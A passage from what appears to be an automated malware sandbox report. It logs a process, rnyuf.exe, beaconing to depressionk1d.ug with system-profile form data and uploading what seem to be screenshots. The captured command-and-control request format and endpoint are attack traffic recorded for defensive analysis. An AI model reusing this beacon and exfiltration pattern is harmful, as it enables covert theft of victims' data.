                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          111192.168.2.449896178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.134850979 CET6368OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.161371946 CET6368INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          112192.168.2.449897178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.308563948 CET6369OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.334965944 CET6369INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          113192.168.2.449898178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.421041965 CET6370OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:42.421276093 CET6370OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:42.421971083 CET6380OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:42.422259092 CET6383OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:42.444580078 CET6386OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:42.444623947 CET6389OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:42.444636106 CET6391OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:42.444648027 CET6394OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:42.444655895 CET6397OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:42.444694996 CET6399OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:42.444722891 CET6403OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:42.517024040 CET6481INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          114192.168.2.449899178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.464411020 CET6409OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.490170956 CET6462INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          115192.168.2.449900178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.620806932 CET6482OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.648977041 CET6482INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          116192.168.2.449901178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.777404070 CET6483OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.803371906 CET6483INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          117192.168.2.449902178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:42.932312012 CET6484OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:42.957523108 CET6484INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:42 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          118192.168.2.449903178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:43.327604055 CET6485OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:43.355326891 CET6524INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:43 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          119192.168.2.449904178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:43.329546928 CET6485OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:43.329691887 CET6485OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:43.329900026 CET6495OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:43.330045938 CET6498OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:43.352382898 CET6509OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:43.352437973 CET6512OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:43.352485895 CET6518OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:43.352503061 CET6521OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:43.353230000 CET6524OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:43.374962091 CET6527OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:43.375025034 CET6535OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:43.442573071 CET6595INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:43 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:43.469909906 CET6595OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:43.496586084 CET6595INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:43 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          12192.168.2.449793178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:14.786380053 CET1887OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:14.786647081 CET1887OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:14.786989927 CET1897OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:14.787478924 CET1900OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:14.808790922 CET1901INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:14 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
